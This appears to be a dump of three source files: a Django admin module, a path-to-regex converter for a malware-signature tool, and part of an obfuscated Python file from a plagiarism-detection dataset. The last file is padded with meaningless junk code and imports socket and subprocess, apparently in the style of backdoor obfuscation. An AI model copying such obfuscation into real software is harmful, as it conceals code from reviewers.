34ce6f44cc67b937884b666ef07dc68046442e7f | edbce79972d35356842edd15fb550a311c10d103 | /ask/admin.py | b9defd0b1463c02fadae3f285bf819c300d85b73 | [] | no_license | TuM0xA-S/djask | 38a4807e0d382d055fb7468d980f890a75f72b50 | e867d28ea30856e9b52f1c6b02f860aa7673127b | refs/heads/master | 2023-03-21T18:09:23.750869 | 2021-03-11T15:17:27 | 2021-03-11T15:28:11 | 343,434,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | from django.contrib import admin
from .models import Question, Answer
admin.AdminSite.site_header = "Djask Administration"
class AnswerInline(admin.StackedInline):
model = Answer
raw_id_fields = ('author', )
extra = 1
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
list_display = ('title', 'author', 'published', 'updated')
list_filter = ('author', 'published', 'updated')
ordering = ('-updated', )
search_field = ('title', 'body')
inlines = (AnswerInline, )
raw_id_fields = ('author', )
fields = ('author', 'title', 'body', 'tags')
| [
"tum0xa-00@mail.ru"
] | tum0xa-00@mail.ru |
12d7d00c1972dabdaf31e66673467531f0c73280 | 379fc4e0e98a7575b93ca4f60d1301adb5c155e3 | /morphling/choco_server/sig_converter/filepathconverter.py | 724e73f1bf770e9ae68e9c8e2995b24a1e842322 | [] | no_license | vangeance666/morphling_all | 7c386551dd09835268d1caf9c645cf76ede4d078 | 288b69b3e47f4585decfba980889b365d717d0ab | refs/heads/main | 2023-06-29T02:22:29.070904 | 2021-08-02T12:51:50 | 2021-08-02T12:51:50 | 391,045,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | from .converter import Converter
import re
class FilePathConverter(Converter):
REG_DRIVE_START = r"^[A-Za-z]:\\"
REG_PROG_FILES = r"program files (\(x86\))?"
def make_slash_reg_compatible(self, line):
return re.sub(r'\\+', "\\\\\\\\", line)
# return line.replace("\\", 2*"\\")
def replace_program_files(self, line):
# print("line", line)
return re.sub(self.REG_PROG_FILES, ".*", line, flags=re.IGNORECASE)
def standardize_drive_letter(self, line):
return re.sub(self.REG_DRIVE_START, self.REG_DRIVE_START, line, flags=re.IGNORECASE)
def apply(self, line):
# The sequence matters!
res = line
res = self.replace_program_files(res)
res = self.standardize_slash(res)
res = self.escape_special_chars(res)
res = self.make_slash_reg_compatible(res)
res = self.standardize_drive_letter(res)
return res
| [
"1902132@sit.singaporetech.edu.sg"
] | 1902132@sit.singaporetech.edu.sg |
4b88f25e57c956314c2911c513bee6f3b763b15d | 44138a906f8e8184752b05325679c7fe8522a8ac | /datasets/python/4_2.py | 8e7405cced259019054b7dd8eb9caa85e0a8a394 | [] | no_license | gorj97/antiplagiat-for-source-code | 55f84180c0a685ea17e6799b7dfd84031aa84030 | 91aa78665e5e7923a32c6d90005efd187620df3b | refs/heads/main | 2023-03-05T18:01:33.947530 | 2021-02-19T18:16:04 | 2021-02-19T18:16:04 | 340,072,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,830 | py | #!/usr/bin/env python
VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW = 'dtjrFuNdaaMPCESNOdueZHpPLaZZYciUtVQVrczCEEDQmsmZveesJgmpySOqplaW'
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = 'JVQABjPSgHRgjrDoEvpdxuCxDHKKkRoJoXlWbJdwEMUeagIJFIlcBiNrZYCzFQXx'
IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws = 'LRIqPICIiRkHsdqehbyztLpvbCXvqXjbFbtuSmDIdgBHuXjBdseHXqgCuMOnCvPX'
AojxIzwEPRatnEOYPKfZRJDaEQWvZUmjootJXcaUnLOFApJFeyaVAcLGmWNApLry = 'FEiszeEmSdqpCsuptkUcfrkyhSJGqozYZZJoMqKutfZrseaDTMssGuJkYPSvYdGZ'
CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw = 'VLrmPHmUWLDyLRBcMJNmnaCGbJMkCiheSsqOAVznDHVxIbOaOMXmmQWSuATroioL'
oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj = 'hSPxcMwLijLAuXYzWBWzoXkTPBkDlGTPNZYMDMWlszeCZQwwIHtWvGzSwZXxECYn'
CzLjtJNfFGFLETouikgeRAYMSndkTbiwQXzAVeVmpwWlBZzdaLddLJkGWdKuvLNI = [
'dtjrFuNdaaMPCESNOdueZHpPLaZZYciUtVQVrczCEEDQmsmZveesJgmpySOqplaW',
'LRIqPICIiRkHsdqehbyztLpvbCXvqXjbFbtuSmDIdgBHuXjBdseHXqgCuMOnCvPX',
'VLrmPHmUWLDyLRBcMJNmnaCGbJMkCiheSsqOAVznDHVxIbOaOMXmmQWSuATroioL',
'eaxVNSmvaLOQnihPJLwTMyITDyuuzuRPmXGNXKMdPRidoCopnuGBJkDFfBJVGuPN'
]
for VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW in oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj:
for IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE in IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws:
if AojxIzwEPRatnEOYPKfZRJDaEQWvZUmjootJXcaUnLOFApJFeyaVAcLGmWNApLry == CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw:
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW
elif CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw == IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE:
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj
else:
CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw = oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj
for IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE in CzLjtJNfFGFLETouikgeRAYMSndkTbiwQXzAVeVmpwWlBZzdaLddLJkGWdKuvLNI:
IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws = IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE
# -*- coding: utf-8 -*-
VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM = 'wcowKrXyxWthZncbaPKmSVmKDCZbBWdJDBprdPxMjPJZDdEdURFAKDgakTGCsfXD'
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = 'oipLOZLiegMZvAoyloZypRuCHLVthQoWqKzbthdtZvOnJfMJftBMFIisijjlChgD'
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = 'nqxzckWgBTtnyRmBeoJlSNclVNEhGlFxDfEERQyQQLxdjUJuUiFtPByKNWvzPVoJ'
IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY = 'thdXrLlAQSGqxaeiykBFHVoSsqchQMqDqPvkIxSXOpBRSHBZOHVuHzkWRFZBnWES'
HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa = 'UvNFAkrVAKVqtKhXLsjvKrYYZnsonDrlgibTKEipjsPruYFZXoGrBJULgQqkfZXo'
lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET = 'NUAGeyRtjrtmSeFCDeAvztoupXHMgAqgAahrlCLjQFYeYZHrQKiOhoXFdDLfLgRD'
if VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM != IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY:
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn
for lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET in IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY:
if lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET != TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn:
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK
else:
HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
else:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM = HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa
if TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn == VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM:
for lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET in VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM:
if lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET == TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
else:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa
import socket
fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE = 'aNwlWbzlnbtQCfMFLRJZmkZztOEaVeqcwVmOPrnXNOkmQFIHeCWYEDTcHUZlPMuD'
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = 'GzJSkblZwTvkbLZLUKGmdrqYHeGixoJTlqwePXPmOJBxUTBnkjTXFmrQfenddkNY'
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = 'zbwpVlLcOsxIipjjINpgOCfzlmdorNajYbZSXgEoSfYrtknKVivfYXwiQyRBJXte'
mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw = 'MMhxpInOsrcNGRnWSbJSflGgJeepyDTnMntQuOyCHexzQOIzsDNbMOrXVyYWSFnc'
oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP = 'jOpQjPBSOzSapjTwJVtYBVjBZtCxwicsuvTfixVZBjaFiMDbAxpxjztJXutuCmuF'
tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV = 'vgYzBvVqEUwwfTtAvgOZfaxHjwgiWvOZcgJiXXwcQguLJHpNCNlxtvthbkMQOQDh'
if fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE != mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw:
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB
for tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV in mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw:
if tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV != NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB:
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv
else:
oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
else:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE = oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP
if NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB == fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE:
for tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV in fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE:
if tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV == NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
else:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP
import subprocess
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'lrpvIOJpnAYBnWgazYaOWZrcyTWenJMnqNCjSIwApLLnrLyOAZgyDhqhAvddiHVh'
DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi = 'vRqBUtpFRDyLRPqNOShFAjRovCyMXsbXDNgQTLNGcPgMUQoKovvBonsduAGuTVhc'
if ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL != DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi:
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'vRqBUtpFRDyLRPqNOShFAjRovCyMXsbXDNgQTLNGcPgMUQoKovvBonsduAGuTVhc'
DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi = ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'lrpvIOJpnAYBnWgazYaOWZrcyTWenJMnqNCjSIwApLLnrLyOAZgyDhqhAvddiHVh'
import struct
def pSvgZAbECxznktbGMQHeBioDzLBUrahEjprYPANMOtwZYEnXQOMGmtOIUHMOicHL(zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH, ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb):
zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH = 'vSyAfIBqkTQqYZfABCHLAQcRndcZrfJwxlXCNfcTfOkiWSUwxwIXiiNmVqXdoIpQ'
ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb = 'WgTJZMaYPHzdOPFMUTTRlKNSAxTOuDqUhjREFbJfjCuWGleYYrnZUIGcclggvTTg'
try:
for bnhHkERDalBFsyGkFgLvPahyXTKkXEjEnwRUXIdIhtYeDcJKuVrHNYlwahJEBUge in zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH:
if bnhHkERDalBFsyGkFgLvPahyXTKkXEjEnwRUXIdIhtYeDcJKuVrHNYlwahJEBUge == ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb:
rOyiYMiKJKJsVxKtcteMSGVGLyIcuFVmhtdhSbFpfmFzxppeWIGFbgIbSYCEhsQJ = []
QASXirqVHeNLvvSDMCTHJVyYkBOAWOWFNeUMGOFkqsBYhMyVXUZUWvjTGgIHgKLF = None
else:
pass
except:
pass
import sys
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = 'DTkYZIJdoUjKjGRibtGWklucEHRlagIDrZuJzMWlxHVcqNaaYkfARhMCcyzpnbSO'
xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST = 'kuAvihkVwDqGmAehOJIENDQOUQfRzDrScNjigvqyLQLSIrmUOgTappWZRIstilTG'
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'HAGCesfUwALLmxqkwjodEbOEQKSfNhlaGcvNCtfBiOJVNeIpAkvrZSNucIvbkSzM'
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = 'FoKXqSKHNScYajltvQUCpGbpfTpWXRvXyNNJyGglCFVknezoxMLzmvaWuevxxanJ'
if xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST == dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN:
for dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW:
for kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
for kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW in xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
if oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA == xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST:
kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW = 'oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA'
elif kzETlNtddLdOWHlsHnqHUJXKFIxCfPyBNBnEIBzPxoVXBJcEPmIxWrWTsivigLsW == oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA:
oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA = dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = oXlHmXoBxFoypKmSpfDoSPeSdPGqsCXzjBqVnBncoYcWEDUpcuxNUHsRJAYMOjCA
else:
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST
try:
qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC = 'GysyZadObJevdPPBxSRuIEQdRawdZJiAWqsYfwhgVnJBQcMHiAMpRdermPoVAeDh'
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = 'vhVDnQiOvMwDQlLPlSwRGuFEmzSZyAIuzNoGkwyLNLFdqHRHmpqCSDjmCciFMShO'
BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL = 'IKdYWObTRQFsJuEujVcRlaEmyscDvsJCortJxsatrnaQTGDTGZubAXrURxpQHSFf'
bjbCjJnEdQebkJOfYEaejowlZgPGImAxJAryTQvLhtUdYIuyICyljbVSMgeApgEJ = 'HvKHSDYmGEJEWfAsKqsgCgRpiCWVzSitTZVlfvOaNpkXSwwADNSMGhMQSbSxrHQP'
VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN = 'DZuxaTMPINEbXlSYyuOdentPSWBBVXXXrfKUFKnDcotMwzIjsQhMyTRRySzdfMDx'
ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo = 'CTbthzhkKpBvwjvSncdcUcpMURxVnCXjVEjxCsEGiFwBnNaQvweUBygWFrgBdaEm'
RGhCdsOOVGTFHBMclmriaolrdxONEyDpufesZpORMoaxPRRQLNLouogtMHzGLHhK = [
'GysyZadObJevdPPBxSRuIEQdRawdZJiAWqsYfwhgVnJBQcMHiAMpRdermPoVAeDh',
'IKdYWObTRQFsJuEujVcRlaEmyscDvsJCortJxsatrnaQTGDTGZubAXrURxpQHSFf',
'DZuxaTMPINEbXlSYyuOdentPSWBBVXXXrfKUFKnDcotMwzIjsQhMyTRRySzdfMDx',
'LmaIXdBTlGYSCOXXNTqEfenKcHQjPsksNNoGFqUjZIryzDympuKvvVfpJOyDoFeu'
]
for qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC in ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo:
for gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo in BKhQMAyIjxUahKPTvUxJaeOpXcjElKCCxOSwewtDoeupIJkQPYxKEsAbWIHmJICL:
if bjbCjJnEdQebkJOfYEaejowlZgPGImAxJAryTQvLhtUdYIuyICyljbVSMgeApgEJ == VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN:
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = qtYUhZQwuqUMXOXknsLBgzIlktgoyZfsAnvYcQfwJWJqXMFFRyKDaGaStBeeAnbC
elif VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN == gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo:
gTXiTKkJvNbQUQLFhjXToAExbdyvoNjamcLSZwROkgmCAdQdLJJuPdOhZuiKzPwo = ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo
else:
VVNUSTEphPIagMPHviAvPlkfPoyXNndyctPycAfWFchDZQpbQjtbdesFRrIZDqxN = ltqrdKnlNPSEyOnztxTdePctXvNtrMlWzFzASqzwCnmpXZGqIbNCELxNOgzLhYVo
